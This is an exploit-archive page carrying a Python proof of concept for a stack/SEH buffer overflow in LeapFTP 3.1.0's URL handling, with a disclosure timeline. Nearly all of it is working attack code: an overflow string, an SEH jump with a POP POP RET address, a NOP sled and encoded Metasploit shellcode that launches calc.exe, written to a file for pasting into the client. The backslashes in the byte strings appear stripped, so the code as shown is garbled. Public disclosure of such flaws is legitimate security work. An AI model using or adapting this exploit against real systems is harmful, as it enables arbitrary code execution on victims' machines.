Home / exploits LeapFTP 3.1.0 URL Handling Buffer Overflow
Posted on 03 September 2014
# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit # Google Dork: "k3170makan is totally awesome" hehehe # Date: 2014-08-28 # Exploit Author: k3170makan # Vendor Homepage: http://www.leapware.com/ # Software Link: http://www.leapware.com/download.html # Version: 3.1.0 # Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7) # Timeline: # * 2014-08-28 : Initial disclosure # * 2014-09-01 : no contact # * 2014-09-01 : public disclosure """ This vulnerability was disclosed according to the terms of my public disclosure policy ( http://blog.k3170makan.com/p/public-disclosure-policy.html) """ from sys import argv if __name__ == "__main__": ovTrigger = 1093 f = open("exploit.txt","w") f.write("ftp://") f.write("A"*ovTrigger) f.write("xEBx06x90x90") #JMP to payload f.write("x44xD3x4Ax77") #POP POP RET f.write("x90"*30) #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1 -b x00x0ax0dxff shellcode = "x89xe0xd9xe8xd9x70xf4x5fx57x59x49x49x49x49" + "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" + "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" + "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" + "x42x75x4ax49x49x6cx68x68x4fx79x35x50x53x30" + "x45x50x35x30x6ex69x79x75x30x31x6ax72x30x64" + "x4cx4bx53x62x56x50x4ex6bx76x32x56x6cx6cx4b" + "x42x72x62x34x6ex6bx54x32x46x48x76x6fx6ex57" + "x61x5ax67x56x45x61x39x6fx64x71x4bx70x4ex4c" + "x55x6cx53x51x33x4cx67x72x76x4cx51x30x59x51" + "x38x4fx64x4dx45x51x49x57x4dx32x58x70x56x32" + "x70x57x4ex6bx31x42x76x70x4ex6bx61x52x47x4c" + "x73x31x5ax70x4cx4bx57x30x53x48x6cx45x4fx30" + "x33x44x51x5ax65x51x48x50x42x70x6ex6bx72x68" + "x67x68x6cx4bx30x58x47x50x77x71x5ax73x49x73" + "x77x4cx71x59x6ex6bx35x64x4ex6bx57x71x4bx66" + "x35x61x4bx4fx34x71x4fx30x4ex4cx59x51x4ax6f" + "x74x4dx75x51x58x47x44x78x59x70x62x55x68x74" + "x33x33x61x6dx4bx48x65x6bx33x4dx47x54x72x55" + "x58x62x36x38x6ex6bx32x78x35x74x55x51x4ax73" + "x73x56x4ex6bx66x6cx72x6bx6ex6bx71x48x77x6c" + "x47x71x78x53x6ex6bx73x34x4ex6bx75x51x5ax70" + "x4bx39x77x34x35x74x71x34x31x4bx51x4bx75x31" + "x71x49x70x5ax66x31x4bx4fx39x70x43x68x43x6f" + "x53x6ax4cx4bx42x32x38x6bx4bx36x53x6dx42x4a" + "x36x61x4cx4dx4bx35x68x39x65x50x35x50x55x50" + "x70x50x52x48x76x51x6cx4bx62x4fx6cx47x79x6f" + "x6ex35x6fx4bx4ax50x4ex55x69x32x32x76x55x38" + "x79x36x6cx55x6fx4dx4dx4dx6bx4fx78x55x75x6c" + "x73x36x31x6cx57x7ax4bx30x79x6bx49x70x70x75" + "x64x45x4fx4bx63x77x37x63x62x52x52x4fx52x4a" + "x77x70x56x33x69x6fx4ex35x30x63x35x31x50x6c" + "x51x73x36x4ex45x35x44x38x33x55x53x30x41x41" f.write(shellcode) f.flush() f.close() #copy contents of exploit.txt to your clipboard and then launch LeapFTP <http://about.me/k3170makan> Keith Makan <http://about.me/k3170makan> about.me/k3170makan <http://about.me/k3170makan>
